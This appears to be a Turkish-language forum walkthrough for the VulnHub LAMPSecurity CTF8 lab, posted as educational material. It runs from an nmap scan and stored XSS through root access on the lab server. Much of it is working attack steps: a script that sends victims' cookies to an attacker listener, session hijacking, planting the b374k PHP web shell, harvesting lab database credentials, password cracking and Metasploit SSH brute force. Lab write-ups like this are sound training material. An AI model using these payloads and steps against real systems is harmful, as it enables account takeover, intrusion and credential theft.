1.                                                

Vulnerable Lampserver Centos(CTF8 )

'CentOS' forumunda tababa86 tarafından 8 Haziran 2016 tarihinde açılan konu

  1. tababa86

    tababa86 Albay

    Katılım:
    12 Mart 2016
    Mesaj:
    948
    Beğeniler:
    138
    Ödül Puanları:
    43
    Cinsiyet:
    Erkek
    Şehir:
    Kore



    Karsi bilgisayar zaafiyetli centos 5 serverdır.Bu serverdaki sitede zaafiyetler var
    Biz önce ipsini nmap ile bulacagiz sonra kod enjekte ederek bazi bilgiler
    elde edecegiz.Mesela sunu yapacaz...üye olacaz...yorum atma kisminda
    xss kullacaz sonra cookie den yararlanacaz...
    not: https://www.vulnhub.com/entry/lampsecurity-ctf8,87/ buradan ctf8 indirin...
    nmap -sV -A 10.0.2.0/24 /bilgisayarin ipsi nedir...
    http://10.0.2.23/
    [email protected]
    comin ...
    server agir anlamadim...
    komut satirindan
    [HASHTAG]#python[/HASHTAG] -m SimpleHTTPServer

    xavier Bruce Yorum atacaz...
    add comment
    hey man!
    <script>alert(1)
    </script> //deneme çalisti mi?evvet
    sonraki kodumuz...
    <script>
    window.onload=function(){
    new Image().src="http://10.0.2.22:8000/?e="+document.cookie
    }
    </script>
    preview diyoruz... komut satirindan bakiyoruz...Evet oluyor dinliyoruz...cookie
    alacaz...
    barbara ya gelelim ona comment yollacayaz
    http://10.0.2.23/content/xavier-bruce //bunu gönderecez...server da sikinti var...
    recent posttan barbara tikladik sonra contact tikladik...
    send email dedik ve komut satirindan bakiyoruz...bize cookie lazim...
    a=den sonra sec ve cookie manager aç
    session dan content yapistir sayfayi yenile ...ve böylece barbara kullanicisiyiz...
    simdi users>list de n kendimizi admin yapalim...
    simdi yan tarafta create content den php sayfasi olusturalim...
    içerisine
    https://github.com/b374k/b374k 'dan b374k.php indirebilirsiniz buradan dosyayi indirip
    içerigini body ye kopyalayin....
    sifre :b374k
    ps ye tikla çalisan islemler..
    eval tikla
    içerisine system("id");
    go deyin...
    simdi system("uname -a");
    go deyin...
    infoya gelin... bakin...
    xpl ye gelin
    sites gelin
    settings.php ye gelin...
    kopyalayin $db_url = 'mysqli://root:[email protected]/drupal';
    root //kullanıcı adı
    JumpUpAndDown //şifre
    localhost
    drupal //veritabanı adı
    db kismina gidin...
    connect to db
    host : localhost
    username: root
    passwd : --------
    connect diyin
    flag içerigini kopyalayin.. #flag#ab38cd01f27d48e13bbef62890c4330e
    drupal git users tikla
    select name,pass from ...
    kopyala...


    password Crackleme ....
    cd /usr/share/wordlists
    cp rockyou.txt /root/Desktop

    cat sifreler |replace "\t" ":"
    cat sifreler |cut -d ":" -f 2
    cat sifreler |replace "\t" ":" |cut -d ":" -f 2
    cat sifreler |replace "\t" ":" |cut -d ":" -f 2 >hashes

    eval gir
    system("cat /etc/passwd"); goo olmadi ise ...
    xpl git
    /var slashe tikla...etc git
    sonra passwd dosyasini aç...hepsini seç...copy it...
    sifrecik.txt kaydet...
    cat sifrecik | cut -d ":" -f 1>sifrecik2
    cat sifrecik2
    sabayon
    ---- kopyala
    users2 diye kaydet bruteforce deneyecez...
    msfconsole aç....
    msf>use auxiliary/scanner/ssh/ssh_login
    show options
    set rhost 10.0.2.23
    set pass_file /root/Desktop/password
    set user_file /root/Desktop/users2
    set user_file /root/Desktop/users2
    set threads 20
    hacklesin bekleyelim
    hala devam ediyor bazi sifreler uydu...
    run
    sid
    sh [email protected]
    sifre isteyecek girin..
    id
    pwd
    sudo -l
    sifre gir...
    sudo su
    cat /etc/passwd
    ve oyun buraya kadar...
     
  2. MrX

    MrX Active Member

    Katılım:
    22 Mart 2016
    Mesaj:
    831
    Beğeniler:
    28
    Ödül Puanları:
    28
    Şehir:
    Belirtilmemiş
    Güzel konu Teşekkürler. :) Klavyene çay dökülmesin
     
  3. tababa86

    tababa86 Albay

    Katılım:
    12 Mart 2016
    Mesaj:
    948
    Beğeniler:
    138
    Ödül Puanları:
    43
    Cinsiyet:
    Erkek
    Şehir:
    Kore
    ctf8 zaafiyetli centos 5 dir Eğitim amaçlı yayınlanmıştır.Amaç gerekli adımları uygulayıp son adıma kadar hacklemektir.
     

Bu Sayfayı Paylaş

Share